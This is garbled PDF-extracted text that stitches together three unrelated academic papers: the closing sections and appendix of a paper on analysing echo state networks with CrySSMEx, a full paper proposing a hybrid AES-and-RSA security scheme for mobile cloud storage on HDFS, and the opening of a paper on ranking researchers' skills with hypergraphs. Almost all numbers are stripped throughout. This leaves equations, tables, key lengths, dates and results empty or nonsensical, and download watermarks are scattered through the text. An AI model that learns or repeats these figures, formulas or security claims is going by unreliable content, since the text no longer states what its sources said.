summarise, we have found the impoverished generalisation of esn to be related to the relative complexity of its internal dynamics, as apparent from the size of its cvq graph. as mentioned in section . . , the depth and size of cvq graphs are partly governed by the quality of the underlying quantisation algorithm: the worse the quantiser, the larger the cvq d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science vq vq vq vq vq vq vq vq vq vq vq vq vq vq vqvq vq vq vq vq vq vqvq vq vq vq vq vq vq vq vq vqvqvq vq vq vq vq vq figure . small fragment of the arrangement of vector quantisers (vq) for splitting the esn state space (corresponding to the fsm of figure ). graph. hence, the size of the cvq graph for esn (figure ) is partly due to the simplicity of the quantiser that was used, rather than from the actual dynamics of the system. however, the immense difference between the cvq graphs for esn and esn+ cannot all be blamed on the quantiser’s suboptimality. therefore, even without a more sophisticated quantisation algorithm, we can provide a reasonable suggestion about what goes on inside the network, and how the dynamics of the two networks underlies their quantitative and qualitative differences. . conclusion cryssmex allows finite state descriptions to be generated from high-dimensional and complex esns, opening up a new window into the internal workings of specific esn instances. in this paper, we have only scraped the surface of the interesting dynamics of esns. only a small step was made towards understanding exactly how and why esn+ manages to utilise its state space in a manner that governs a deeper correspondence to the intended grammar. it is our hope and conjecture that cryssmex may provide much deeper insights into these systems than presented in this paper, insights that may lead to further improvements beyond those of the esn+ model. acknowledgements this research was supported by grant - - from the netherlands organisation for scientific research (nwo) and by eu grant fp - -ip. notes . cryssmex can be downloaded from http://cryssmex.sourceforge.net/ . this is because it has been argued that people only need to experience a word in one grammatical position to generalise it to novel positions. consequently, neural networks should also have this ability in order to be regarded as cognitive models of human language processing (hadley ). d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h s.l. frank and h. jacobsson . note that all nouns within each of the three subcategories (as well as all verbs) are interchangeable in the training sentences. as a result, their representations will become more and more similar as the number of training sentence is increased. . that is, when outputs are discretised by syntactical category. as figure shows, the output vectors of esn+ are not identical to the true probability distributions. references andrews, r., diederich, j. and tickle, a.b. ( ), ‘survey and critique of techniques for extracting rules from trained artificial neural networks’, knowledge based systems, , – . bodén, m. and wiles, j. ( ), ‘context-free and context-sensitive dynamics in recurrent neural networks’, connection science, , – . bullinaria, j.a. and levy, j.p. ( ), ‘extracting semantic representations from word co-occurrence statistics: a computational study’, behavior research methods, , – . čerňanský, m. and tiňo, p. ( ), ‘comparison of echo state networks with simple recurrent networks and variable-length markov models on symbolic sequences’, in artificial neural networks – icann , part i (vol. ), eds. j.m. de sá, l.a. alexandre, w. duch and d.p. mandic, lecture notes in computer science, berlin: springer, pp. – . čerňanský, m. and tiňo, p. ( ), ‘processing symbolic sequences using echo-state networks’, in from associations to rules: proceedings of the th neural computation and psychology workshop, eds. r.m. french, and e. thomas, singapore: world scientific, pp. – . čerňanský, m., makula, m. and beňušková ľ. ( ), ‘improving the state space organization of untrained recurrent networks’, in proceedings of the th international conference on neural information processing, auckland, new zealand. elman, j.l. ( ), ‘finding structure in time’, cognitive science, , – . frank, s.l. ( a), ‘learn more by training less: systematicity in sentence processing by recurrent networks’, connection science, , – . frank, s.l. ( b), ‘strong systematicity in sentence processing by an echo state network’, in artificial neural net- works – icann , part i (vol. ), eds. s. kollias, a. stafylopatis, w. duch, and e. oja, lecture notes in computer science, berlin: springer, pp. – .. frank, s.l. and čerňanský, m. ( ), ‘generalization and systematicity in echo state networks’, in proceedings of the th annual conference of the cognitive science society, eds. b.c. love, k. mcrae, and v.m. sloutsky, austin, tx: cognitive science society, pp. – . hadley, r.f. ( ), ‘systematicity in connectionist language learning’ mind and language, , – . hopcroft, j. and ullman, j.d. ( ), introduction to automata theory, languages, and compilation, reading, ma: addison-wesley publishing company. jacobsson, h. ( ), ‘rule extraction from recurrent neural networks: a taxonomy and review’, neural computation, , – . jacobsson, h. ( a), ‘the crystallizing substochastic sequential machine extractor: cryssmex’, neural computation, , – . jacobsson, h. ( b), ‘rule extraction from recurrent neural networks’, uppublished doctoral dissertation, department of computer science, university of sheffield, sheffield, uk. jacobsson, h., frank, s.l. and federici, d. ( ), ‘automated abstraction of dynamic neural systems for natural language processing’, in proceedings of the international joint conference on neural networks, orlando, fl, pp. – . jaeger, h. ( ), ‘the “echo state” approach to analysing and training recurrent neural networks’, gmd report no. , gmd – german national research institute for computer science, http://www.faculty.iu- bremen.de/hjaeger/pubs/echostatestechrep.pdf. jaeger, h. ( ), ‘adaptive nonlinear system identification with echo state networks’, in advances in neural infor- mation processing systems (vol. ), eds. s. becker, s. thrun and k. obermayer, cambridge, ma: mit press, pp. – . mirkin, b. ( ), mathematical classification and clustering (vol. ), dordrecht, the netherlands: kluwer academic publishers. servan-schreiber, d., cleeremans, and a. mcclelland, j.l. ( ), ‘graded state machines: the representation of temporal contingencies in simple recurrent networks’, machine learning, , – . tiňo, p., čerňanský, m. and beňušková, ľ. ( ) ‘markovian architectural bias of recurrent neural networks’, ieee transactions on neural networks, , – . tong, m.h., bickett, a.d., christiansen, e.m. and cottrell, g.w. ( ), ‘learning grammatical structure with echo state networks’, neural networks, , – . appendix . inverse of softmax the softmax function (equation ( )) does not have an inverse in general. however, it is possible to define a proper inverse for the particular target vectors that arise in our esn training procedure. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h connection science we have a network with n output units, one of which (called unit c) represents the correct output for each input vector. in the corresponding target output vector u = (u , . . . , un), element c should have large value (i.e., close to ) whereas all other elements should have small values (i.e., close to ). that is uj = { − �c if j = c �i if j �= c. ideally, �c = �i = , making uc = and ui = . however, the softmax inverse will be applied to u and its domain does not contain and . therefore, we take �c, �i > . also, it is desired that uc > ui , so − �c > �i . from here on, we denote by i all output units that are not c, so always i �= c. note that we assume that the target values �i are equal for all i. we are looking for the inverse of the softmax function, that is, we want to find xi and xc such that exi∑n j = e xj = �i and exc∑n j = e xj = − �c. (a ) first, note that ∑n j = e xj = exc + (n − )exi . therefore, equation (a ) becomes exi = �i exc + �i (n − )exi and exc = ( − �c)exc + ( − �c)(n − )exi ⇐⇒ exc = exi ( − n�i + �i �i ) and exc = exi ( ( − �c)(n − ) �c ) ⇐⇒ xc = ln ( − n�i + �i �i ) + xi and xc = ln ( ( − �c)(n − ) �c ) + xi . (a ) since uc > ui , we must have xc > xi , so − n�i + �i �i > ⇐⇒ �i < n− . from equation a , it is clear that − n�i + �i �i = ( − �c)(n − ) �c , which yields �c = (n − )�i . this means that �i and �c cannot be set independently: choosing some minimum target value �i < n − fixes �c as well. the total target output is∑ j uj = ( − �c) + (n − )�i = − (n − )�i + (n − )�i = . therefore, the target vector forms a probability distribution. by choosing a low enough value for �i , the difference between xc and xi is fixed as in equation a : xc = ln(�− i − n + ) + xi . as it turns out, it is only this difference that matters in practice: adding a constant value y to xc and xi does not change the networks’ output. let wy,out denote the output connection weights resulting from this addition of y (for convenience, we ignore the bias vector). as in equation ( ) of section . . , a is the matrix of dr states resulting from the training inputs, and u is the matrix of corresponding target outputs. the resulting connection weights are wy,out = ( f− out (u) + y ) a+ = f− out (u)a+ + ya+ = wout + ya+. after training, the network receives an input resulting in the dr state adr . its output becomes (see equation ( ) in section . . ): fout (wy,out adr ) = fout (wout adr + y|a+adr |), which equals fout (wout adr ) because the softmax function is translation invariant (i.e., fj,out(x + a) = fj,out(x)). since it does not matter whether the connection weights are wout or wy,out , adding y to xc and xi has no effect. we can therefore simply take xi = . to summarise, all that is needed for training an esn with the softmax output activation is to choose an �i < n − . the softmax inverse of the target outputs then equals: f − j,out(u) = { ln(�− i − n + ) if j = c if j �= c. d o w n l o a d e d b y : [ u n i v e r s i t e i t v a n a m s t e r d a m ] a t : : m a r c h international journal of advanced network monitoring and controls volume , no. , a mobile terminal security strategy based on the cloud storage wang hui, tang junyong school of computer science and engineering xi’an technological university, xi’an , china email: @qq.com abstract. with the emergence of mass storage systems and the development of the distributed file system, cloud storage system has become the focus of the industry. the cloud storage services on mobile terminal have been putted on the agenda based on the rapid development of intelligent mobile terminal. based on the analysis of the architecture of hdfs and dynamo, a mobile terminal security strategy is presented in this paper. the database technology and t he dynamic consistent hashing algorithm are adopted to deal with different target groups. according to the storage costs of nodes, data would be integrated scheduling by the storage system. make full use of the advantages of aes(advanced encryption standard) and rsa. a solution that combines aes and rsa encryption algorithm is proposed to implement the mobile terminal cloud storage security. through the theoretical analysis and the simulation results, the cloud storage strategy proposed in this paper can make the cloud system achieve load balance. moreover, multi-copy mechanism can improve the overall efficiency of the system. keywords: cloud storage, hdfs, dynamo, dynamic consistent hashing algorithm, aes, rsa, multi - copy mechanism . introduction with the rapid development of the internet of things, more and more people are used to using mobile devices such as smart phones to surf the internet, chat, browse news, shopping entertainment, and view all kinds of information. traditional mobile cloud storage systems have lower storage density, the overall storage efficiency is low too. traditional cloud storage systems do not adapt well to different application environment sand do not guarantee the integrity and confidentiality of cloud data. the cloud storage service does not guarantee that the data and operation of mobile users will not be lost, damaged, leaked, or illegally exploited by malicious or non-malicious. so it’s very dangerous for sensitive data to be stored directly in the cloud. simple encryption techniques have key management issues and can’t support complex requirements such as query, parallel modification, and fine-grained authorization. as a result, a mobile cloud storage security technology solution is proposed in this paper, which enables reliable and secure cloud storage. first, the distributed file system (the hadoop distributed file system, hdfs) and dynamo would be compared in this paper, and then the dynamic consistency hash algorithm is introduced to realize the processing of data in different size. according to the storage cost of each storage node, select the optimal storage node to implement the access of mobile cloud storage. the relational database is used for storing indexes in small object files, and the class dynamo system model is used to handle large object files. a mobile terminal security strategy based on the cloud storage the cloud storage system will choose the closest copy when the mobile terminal makes a request. this method can effectively improve the storage efficiency of the cloud system and ensure the load balance of the system. on the basis of implementing the mobile cloud storage, we make full use of advantages of aes and rsa algorithms, a cloud storage security scheme for mobile is proposed in this paper. the solution combines aes and rsa encryption algorithms to improve the shortcomings of the cloud storage system. the reliability model of the cloud storage system is also proposed in the paper. finally, a series of simulation experiments show that the proposed cloud storage security technology scheme is a reliable scheme with higher security. . system architecture of the mobile cloud storag cloud storage is developed on the basis of clustering techniques and embedded virtualized technologies, which is an extension of cloud computing. grid technology, cluster technology and distributed system are used in cloud storage, which coordinated all different types of storage devices in the network. all these technologies and devices can be cooperated with cloud storage to provide the required data storage capabilities and related business visit. cloud storage is not a single storage device. the nature of cloud storage is not storage. the essence of cloud storage is providing services. different ways are taken to deal with different sizes of objects. in this way, system architecture of the mobile cloud storage is designed . system architecture of the mobile cloud storage is shown in figure . figure. system architecture of the mobile cloud storage users access the network through a mobile terminal. the lowest load in the dispatcher group is selected by the mobile terminal and then communicates with it. depending on the size of the file to determine whether control is handed over to the relational database machine group or to the storage group. small files are handed over to the relational database machine group, and large files are processed by the storage group machine group. the copy mechanism was introduced to improve the reliability of the cloud storage system, multiple-copy mechanism can effectively improve system efficiency. when a mobile terminal makes a request, the closest copy can be chosen. the primary copy would be selected first in traditional cloud storage system. the request is made to the standby copy only when the master copy is wrong. this process affects the speed of the traditional cloud storage system without considering the location of the copy. different storage policies and backup solutions are described in this article, which are used in the relational database machine group and the storage group machine group. international journal of advanced network monitoring and controls volume , no. , . storage policies and backup plans hdfs and dynamo are reliable solutions that are commonly used in the cloud storage system. hdfs is a distributed file system that is suitable for running on common hardware. hdfs has good fault tolerance and can be used for inexpensive hardware. hdfs provides data access mechanisms with high throughput that can be widely applied to large data sets. distributed file systems are developed on the infrastructure of the apache nutch search engine and apply to batch processing for data storage. hdfs emphasizes data throughput rather than response time for accessing data. the program in hdfs has a lot of data sets. file size of the hdfs is typically gigabyte to terabyte. as a result, terabytes of large files can be supported in hdfs through higher aggregated data bandwidth. and hundreds of nodal devices can be contained in a cluster, which allowing the terabytes of large files to be supported in it. dynamo is storage platform of amazon, and the key-value pair is used to store data in the key-value database schema. dynamo has better availability and the higher extensibility. in dynamo, the data are segmented according to the hash algorithm used in distributed file systems. and then all these segmented data are stored in separate nodes. the corresponding node is searched according to the hash value of the key, so that the read operation is realized in dynamo. the consistency hash algorithm is used by dynamo. at that time, it’s not the exact hash value, but a range of hash values. when the hash value of the key is in this range, it will be searched clockwise along the loop, and the first node encountered is what we need. the consistency hash algorithm is improved by dynamo, and in the ring,a set of devices are acted as a node rather than only one device is acted as a node. the synchronization mechanism is used to achieve the consistency of the data. in hdfs the numbers of the copies are set to be . whether the data would be stored in the node or not depends on the capacity of the node. the greater the capacity of the node, the greater the probability that the data will be stored in this node. so, when the capacity of the node is quite different, the nodes with large storage capacity in the system would be overloaded. the copy mechanism proposed in this paper can achieve load balancing, and the reliability and availability of cloud storage are also effectively improved. the system replication policy includes dynamic replica policies and static replica policies. the static copy strategy refers to the numbers of copies. the placement is fixed from the start to the data failure. the dynamic copy strategy is a strategy that system can adjust the numbers of copies in real time and their location, depending on performance requirements, load, and so on. the copy strategies for small files and large files are described as follows. . the copy strategy for a small file files that do not exceed mb are defined as small files. the sql server relational database is used as the copy strategy for small files. after receiving the file from the mobile terminal, the dispatcher will judge its size first, and then, once the small file is identified, it will be handed over to the relational database machine group. the correlation properties of the file are stored in the database table. the optimal node with the lightest load is dynamically selected by the database machine group. the lightest load database server in the machine group is selected to store the file, and keep a copy to ensure the reliability of the data. the ip address of the database server will be stored in the primary server. the ip address of the database server is retrieved and got from the primary server and then interacts with the database server. the storage processing pattern for small files is shown in figure . a mobile terminal security strategy based on the cloud storage figure. the storage processing pattern for small files the corresponding relationship is stored in the data table in the primary server, and the corresponding relationship is the file name and the server ip address. the data table is shown in table i. table data tables in the primary server field typ length note id int serial number fname varchar filename ip varchar ip address file names, file sizes, and content are stored in the database server. the file information table is shown in table . table the file information table field typ length note id int serial number fname varchar filename fsize int file size creat datetime creation time context mediumtext content . the copy strategy for large files files larger than mb are called large files. the storage group is used as a copy strategy for large files. the system architecture of the storage group is fully connected. the system architecture is shown in figure . the pc is used as a storage medium in the storage group. however, the reliability of the pc is not high, and it will even fail when the data is stored. therefore, a copy is required to ensure that the data is reliable. international journal of advanced network monitoring and controls volume , no. , figure. the system architecture diagram of the storage group in the storage group system, all information about adjacent nodes are stored in every pc. the needed storage nodes can be found quickly through querying the information stored in the nodes. the structure of storage space in the storage group is ring, and at the same time, the method of the unified addressing is adopted. in the storage group, the difference in performance of the pc can be offset by the virtual contiguous storage space. first, the hash algorithm message-digest algorithm is used to implement system address conversion. the actual physical address is processed and converted to - bit information string through the md algorithm, and then these information string are stored in the virtual continuous address. thus, the differences in performance between devices will be offset. the loop storage structure of the storage group is shown in figure . figure. the loop storage structure of the storage group the converted address is mapped to the virtual storage space loop of the storage group through the md algorithm. the device is found in the clockwise direction, and then the data is stored in the first pc mapped. the data is backed up to two adjacent pc. the larger the amount of data in the system, the more uniform the spatial distribution will be. the data are stored when the routing of the corresponding pc and adjacent pc are updated. the routing information table is shown in table . table routing table field typ length note id int serial number fname varchar filename fsize int file size ip varchar ip address a mobile terminal security strategy based on the cloud storage the ip address of the pc device where the file replica is located is stored in the ip field in the routing information table. the ip field is the routing information for the adjacent pc. once a node fails, all the information stored in the node are backed up and the routing information of the adjacent node is modified in time. according to the principle of the consistency hash algorithm, the storage space of the new pc device will be mapped to the new virtual address space when a new device needs to be added to the storage group. the existing space on the ring will not be changed, and this method can be very effective in avoiding the vibration of the address space. meanwhile, the routing information on the adjacent pc are updated. the process of adding a pc is as shown in figure . figure. the process of adding a pc the process of exiting the storage group is essentially the same as the process of joining. in the clockwise direction, there are three pc in the storage group, x, y, and z. if y applied to get out of the loop, the information that was stored in the y would be copied from x to z, and the information that was stored in the y would be copied from z to x, and then, the data in y-master backup is copied to the first device from z of the loop. . security design of the cloud storage cloud storage is a hot topic in industry and academia in recent years, and the security problems of the cloud storage would have been under scrutiny. the aes(advanced encryption standard) algorithm is simple and the encryption of aes is fast. however, aes has problems with key allocation and confidentiality management. there is no need for secret allocation of keys in asymmetric encryption algorithms, and at the same time the security of the keys is easier. in addition, user authentication and digital signatures can be achieved through the rsa algorithm. to make full use of the advantages of the aes and rsa algorithms, a solution that combines aes and rsa encryption algorithms for mobile terminal cloud storage security design is proposed in the paper. . encryption and decryption design for mobile terminal after the data is encrypted through aes, then the encryption key is encrypted by rsa. the encrypted key message are binded to the encrypted data. the message will then be stored in each node of the hdfs. this approach can improve the storage efficiency of the mobile cloud storage system and also solve the key distribution of single key cryptography. when the data on hdfs is read and downloaded, the ip address of the adjacent pc is got by broadcast the virtual address is obtained through the consistency hash algorithm update the routing table update the routing table of the adjacent pc international journal of advanced network monitoring and controls volume , no. , the aes key is extracted from the cryptograph, then the decryption is obtained through the user’s private key, finally, the document is declassified and plain text is obtained. the process is as follows. ) during data encryption uploads, users log in to the cloud storage system, sending data requests to hdfs and encrypting the transfer. at the same time, a -bit aes encryption key is generated by the client random key generator. ) on the mobile side, the data that needs to be transmitted is encrypted with the aes key, and the cipher text would be got. ) the encryption key of the file is encrypted through the -bit rsa public key, and then the key cipher is obtained. ) the key cipher are bound to the file cipher, in accordance with the file cipher, the file is stored in the hdfs file system with the corresponding tag bit and data length identification. ) when the data is downloaded from an hdfs system in the cloud, the data are decrypted and downloaded. after the data are obtained, which are transferred from the hdfs system to the mobile end. the first bit of data is judged first by the system, and if it is zero means that the data is in plain text, the data are restored after removing the tag bits. on the contrary, if it is means that the data is a cipher, it should be decrypted. ) first, extract a -byte aes key cipher from the data, aes plaintext key are got by decrypted the user’s personal rsa private key. ) the cipher part of the stored file cipher is decrypted by aes through the aes key, and then the stored file plaintext is got . the data storage format of the cloud storage system the data for the cloud storage system includes two storage formats, which are plaintext storage and crypto text storage. the storage format is shown in figure figure. the storage format of the file if the first digit in the storage format is , which means that the data is stored in plain text, on the contrary, if it is means that the data is a cipher. the bytes need to be added before the cipher text to store the aes cipher key encoded by rsa when the data is stored in cipher text. the field for the valid (b)the storage format of cipher text file key bit data length cipher byte byte (a)the storage format of the plaintext file plaintext bit a mobile terminal security strategy based on the cloud storage length of the data is bytes, and the field of cipher represents the encrypted text by aes. each -byte byte stream is encrypted with aes and is converted into a -byte cipher stream. so the length of the cipher section grows relative to the original plaintext data. . security analysis the security design of the mobile cloud storage is implemented in a combination of the aes algorithm and the rsa algorithm. the security is analyzed separately for the aes and rsa algorithms. the security of aes is analyzed through exhaustive attack, the differential attack, and interpolation attack when the aes key don’t be known. ) exhaustive attack: the average complexity of the exhaustive key is k- aes encryption, in which k is the length of the key. for the -bit key in this scheme, times of aes encryption are required and the calculation is very large, and obviously this method of attack is invalid. ) differential attack: the wide trajectory strategy adopted by the aes algorithm can effectively resist differential attacks. the prediction probability of the difference trajectory is between and after four rounds of transformation, it’s between and after the eight transformations. so, enough times can be identified to make all the differential trajectory less than / n- , n is the number of blocks. this makes the difference attack fail. ) interpolation attack: f domain in aes algorithm, expansion is shown as blow: + fx +b x + x +f x + x +f x + x + x because the expansion is complex, the attack is also invalid. through this analysis, the aes algorithm is better immune to known attacks the unknown aes key, from the analysis above, we can learn that the aes algorithm is better immune to known attacks in case of not knowing the aes key. also, the user’s files in hdfs are stored in a certain size, and the security of the system can be further enhanced. therefore, the main issue of security is the security of the aes file encryption key. how to manage and store file encryption keys is the key to determining the security of the solution. in the design scenario presented in this article, technology of one-timepad is used for file transfer storage. each data stored has a different aes key, and the aes key is transparent to the user. in addition, the aes key for each file is encrypted by using the rsa algorithm. the encrypted aes key is bound to the file cipher and then stored in hdfs. the user must take care of his rsa private key throughout the process. the above encryption is done on the mobile side, which implements the file’s cryptographic transfer and cryptographic storage. and then the security of rsa is analyzed in detail. the security of rsa depends on the large integer factorization. the difficulty of attacking the rsa system is the difficulty of the large integer factorization. the schroeppel algorithm is a better factorization algorithm, and which is often used to analyze the problems of the large integer factorization. the number of operations required in decomposing the factor of decimal number n with different length by using schroeppel algorithm. the number of decomposing operations is shown in table iv, in which the factor of decimal number n with different length is decomposed by using schroeppel algorithm. international journal of advanced network monitoring and controls volume , no. , table the number of operations of decomposition factor by using the schroeppel digits of decimal number n the number of operation . × . × . × . × . × the longer the length of n is, the more difficult the factorization is in the rsa algorithm. for every ten bits of binary that are added, the time of decomposition is going to be doubled. and then the harder it is to decode the password, the more the strength of the encryption will be. a key length of , , bit are often selected in rsa. in the cloud storage security technology solution designed in this paper, the -byte aes key is the object of rsa encryption, the system will be highly secure once the key of bit is selected. assuming that the reliability of the cloud storage system is a. the time of encryption through different encryption algorithms is at, the encryption time at is reversed first,and after the normalization processing,aj is got from at. the transfer rate of a file with the same size after the normalization processing is ak,n is the copynumber. the reliability model of the system is: ]) ( ][) ( [ nk n j aaa −−−−= ( ) it can be concluded through the analysis of the reliability model, when the value of aj and ak are more closer to , and the number of n is more larger, the cloud storage system will be more reliable and with higher security. . experiment and result analysis the hadoop cluster built in this article consists of one namenode server and three datanode servers. the client submits the data through the namenode server. the configuration of the four datanode servers is: intel dual core cpug @ mhz; network environment for netlink bcm gigabit ethernet; the version of hadoop is . . ; the version of linux is ubuntu . ; and jdk . . _ is used. the configuration of client is pentium/(r) dual-core cpu e @ . ghz. the mobile terminal is huawei y -cl , qualcomm snapdragon cpu and gb memory are used. a certain number of storage nodes are simulated by using cloudsim simulation. the data response tests are performed on file upload, file copy and file movement, for large files and small files respectively. system is tested by using a smart mobile terminal. experimental results demonstrate that the page is properly displayed, and the response time of the login page is basically completed within two seconds. the percentage of the response time for the transaction is shown in figure . figure. the percentage of the response time for the transaction a mobile terminal security strategy based on the cloud storage through the analysis of figure , it can be known that percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. the experimental results show that the system responds fast. the average response time of the transaction is obtained from the diagram. although one of the transaction response time is longer, but the response time for most other transactions is acceptable. when this happens, it is thought that the performance of the mobile cloud storage system is better. after the encryption and decryption mechanism is introduced in the security of the mobile cloud storage, the security of the cloud storage is improved effectively. there are two questions to be considered: the impact of encryption and decryption on file speed; the impact of encryption and decryption on the performance of the client host. in the mobile cloud storage security technology proposed in this article, the method of encrypting and decrypting the file on the mobile end is used. the length of the file will change after the file is encrypted into a cipher file. according to the analysis of the file storage format in . . the header of each cipher file needs to be added bytes to store the aes secret key. in addition, when the aes file is encrypted, each bytes text will be encrypted and then changed to bytes cipher. in conclusion, after encrypting,the length of the cipher file is about . percent more than the file. the namenode and datanode in hdfs may be caused an additional cost of about . percent after encrypting. for clientnode in hdfs, the time spent on file encryption and decryption is increased, and the performance is reduced eventually. the effect of file encryption and decryption on the whole file transfer rate is mainly in two aspects: the time required to encrypt and decrypt the transmission file by using aes; the time spent on encrypting and decrypting the aes key by using rsa. the experimental data are listed in table , which includes the time spent on encrypting the different sizes or different types files by using aes and the time spent on transmitting the file in hdfs. table time comparison on aes encryption and decryption file size file type aes encryption hds upload aes decryption hds download (m) (ms) (ms) (ms) (ms) . pdf . mp . mkv . doc . rmvb the time that aes key is encrypted by using rsa are also tested. by using rsa the bit aes key was encrypted for an average time of ms and decrypted for an average time of ms. it can be concluded from the above test data, the time spent on encryption or decryption by using aes is regardless of the file type. the time comparison on aes encryption and decryption is shown in figure . international journal of advanced network monitoring and controls volume , no. , figure. time comparison on aes encryption and decryption the same size files are encrypted by different aes, rsa, or rsa + aes algorithms and then the encryption time is different, as shown in table x. table time comparison for different algorithm encryption file size aes encryption rsa encryption aes+rsa encryption (m) (ms) (ms) (ms) . . . in the solution proposed in this paper, the time of aes key encrypted or decrypted by using rsa is relatively short. file transferring have little impact on total time loss and user experience. it may takes a relatively long time to encrypt files by using the aes, which cause a significant additional time overhead for hdfs. however, the encryption time that aes combined with rsa for encrypting the file was not significantly increased compared to rsa. besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. the . mb file in table vi is the test case. table and table are the test result. table the performance of the mobile end upload the data type of test utilization rate of transmission utilization rate of mobile cpu(%) rate(mbps) mobile /transmission rate raw data . . . after the encryption . . . table the performance of the mobile end download the data type of test utilization rate of transmission utilization rate of mobile cpu(%) rate(mbps) mobile /transmission rate raw data . . . after the encryption . . . a mobile terminal security strategy based on the cloud storage the ratio of cpu occupancy to upload speed is shown in table , which the data on the mobile side are tested before the encryption and after the encryption respectively. the ratio of cpu occupancy to download speed is shown in table , which the data on the mobile side are tested before the decryption and after the decryption respectively. it can be known from the table and the table , if the encryption and decryption mechanism are used for hdfs transmission, then the cpu utilization will be increased by an average of % ~ % and the overall file transfer rate will be reduced by % ~ %. as we can see, when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. although the encryption mechanism and decryption mechanism will cause some performance loss to the mobile end, the confidentiality of the data can be guaranteed. so it is acceptable from the perspective of user data security. lots of time are spent during encryption or decryption, which can cause a drop in transmission rates. two points of improvement are proposed for this situation: ) the user can choose whether or not to encrypt the file. important files are usually in the form of text or images, which are generally small and can choose to be encrypted. however, some larger files, such as video, audio, etc., users can choose whether to encrypt or not. the less important files are stored in plain text, which can improve the access efficiency of the files. ) for cloud storage users, the file transfer and stored procedures are transparent. therefore, the transport encryption buffer can be set up on the client for large file transferring. after the transfer request is submitted by the user, the file’s decryption and transfer operations are implemented in the background. after the transfer is completed, only the prompt message can be given on the mobile end, which can improve the user experience. using the reliability model formula of the cloud storage system proposed in . , combine the time required for processing the same size of file in table , when a different algorithm aes, rsa, or rsa + aes is used, the encryption time required for encrypting file, after that the encryption time is reversed, aj then be got after the encryption time is normalized. in the same way, after normalizing, transfer rate ak is got. if both aj and ak are closer to , and the number of copies in the cloud storage system is larger, then the reliability of the system is higher. according to the above analysis, the data in one hour is sampled continuously, combined with the data in table and table , the reliability contrast diagram for the cloud storage system is shown in figure . figure. the reliability contrast diagram international journal of advanced network monitoring and controls volume , no. , it can be know the reliability of the system through different algorithm by comparing the data in figure . by using the rsa encryption, the system’s reliability values are almost maintained at . the reliability of the system is relatively high. that is, it has little impact on file transfer and user experience by using rsa encryption. it may takes a relatively long time to encrypt files by using the aes. and the reliability of the system is very jitter. it is shown that the system reliability is low with aes encryption. however, the encryption time that aes combined with rsa for encrypting the file was not significantly increased compared to rsa. the value of the system reliability is consistent with the use of rsa, which can be maintained around . it is concluded that the system is relatively reliable by using aes and rsa encryption. through the simulation experiment, it is verified that the mobile cloud storage system has a good user experience. it is also verified that the multi-copy mechanism of the cloud storage system can effectively improve the efficiency of the cloud storage system. when a mobile terminal makes a request, the closest copy is selected and then the time can be saved effectively. in the solution presented in this paper, the encryption and decryption performed by the mobile side has the following characteristics: transport security and storage security of the user data are guaranteed. the mobile side finish the encryption before calculating the checksum, so the encryption will not break the hdfs data integrity check mechanism. in the entire distributed file storage system, the encryption and decryption are scattered to the various mobile devices. while this will cause some performance damage to the mobile, there is no additional performance penalty for namenode and datanode. the solution enables the entire distributed file system to be protected by data privacy, and there is no significant performance penalty for multi-user, large access, and file access. in the current version of hdfs, the mobile user identity is given by the host operating system. the user authentication mechanism for the hdfs mobile is also very flawed. in the scheme proposed in this paper, the rsa algorithm and its public key library are introduced, which can create the prerequisite for solving the kind of problem. . conclusion cloud storage security technologies for mobile terminals proposed in this paper, different storage policies are used for file in different size. considering the storage efficiency of mobile, the load balancing effect of cloud storage system is improved, and the stability and extensibility of cloud storage system is improved. in addition, in order to make the cloud storage system has higher reliability. according to the characteristics of hdfs data input output and integrity checking, the aes algorithm is used to encrypt the files uploaded by the user on the client side of hdfs. this ensures that the confidentiality of mobile user data in the cloud storage system. by using the rsa algorithm, the security of the aes key is guaranteed, and the issue of distribution and management of the aes single key password can be resolved. the two storage formats of the cloud file are designed to implement the user’s own choice, reduce the number of copies, and ultimately improve the storage efficiency of the mobile cloud storage system. finally, the reliability of the mobile cloud storage security technology scheme is verified through a series of simulation experiments. the mobile cloud storage security technology scheme proposed in this paper has better security and reliability. but there are still many problems that have not been solved, and further research is needed. a mobile terminal security strategy based on the cloud storage in order to improve the user experience by setting up the encryption buffer. at the same time, pki technology can be used to implement ca authentication and digital signatures for hdfs users to further enhance hdfs security. foundation item the industrial research project of science and technology department of shaanxi province(grant no. ktzdgy - ) references [ ] idziorek j, tannian m, jacobson d. attribution of fraudulent resource consumption in the cloud [j]. ieee fifth international conference on cloud computing, : - . [ ] tsai t, theera -ampornpunt n, bagchi s. a study of soft error consequences in hard disk drives [j].ieee/ifip international conference on dependable systems and networks (dsn ), : - . [ ] schmuck f b, haskin r l.gpfs: a shared-disk file system for large computing clusters[c]//proceedings of the conference on file and storage technologies, january - , : - . [ ] namjoshi j, gupte a. service oriented architecture for cloud based travel reservation software as a service[c]// proceedingsof the ieee international conference on cloud computing(cloud’ ), bangalore, india, sep - , .los alamitos, ca, usa: ieee computer society, : - . [ ] goth g. virtualization: old technology offers huge new potential [j].ieee distributed systems online, , ( ). [ ] bowers k d, juels a, oprea a. proofs of retrievability : theory and implementation [j]. proceedings of the acm workshop on cloud computing security (ccsw′ ), : . [ ] armbrust m, stoica i, zaharia m, et al. a view of cloud computing [c]. communications of the acm , , ( ): . [ ] mell p, grance t. nist special publication - :the nist definition of cloud computing [j]. national institute of standards and technology, . [ ] karame g o, capkun s, maurer u. privacy -preserving outsourcing of brute-force key searches[j]. proceedings of the rd acm workshop on cloud computing security workshop (ccsw′ ): : . [ ] schiffman j, moyer t, vijayakumar h, et al. seeding clouds with trust anchors [j]. proceedings of the acm workshop on cloud computing security workshop (ccsw′ ), : submitted november accepted february published march corresponding author xiaomei bai, xiaomeibai@outlook.com academic editor diego amancio additional information and declarations can be found on page doi . /peerj-cs. copyright kong et al. distributed under creative commons cc-by . open access skill ranking of researchers via hypergraph xiangjie kong , lei liu , shuo yu , andong yang , xiaomei bai and bo xu key laboratory for ubiquitous network and service software of liaoning province, school of software, dalian university of technology, dalian, china anshan normal university, computing center, anshan, china abstract researchers use various skills in their works, such as writing, data analysis and experiments design. these research skills have greatly influenced the quality of their research outputs, as well as their scientific impact. although many indicators have been proposed to quantify the impact of researchers, studies of evaluating their scientific research skills are very rare. in this paper, we analyze the factors affecting researchers’ skill 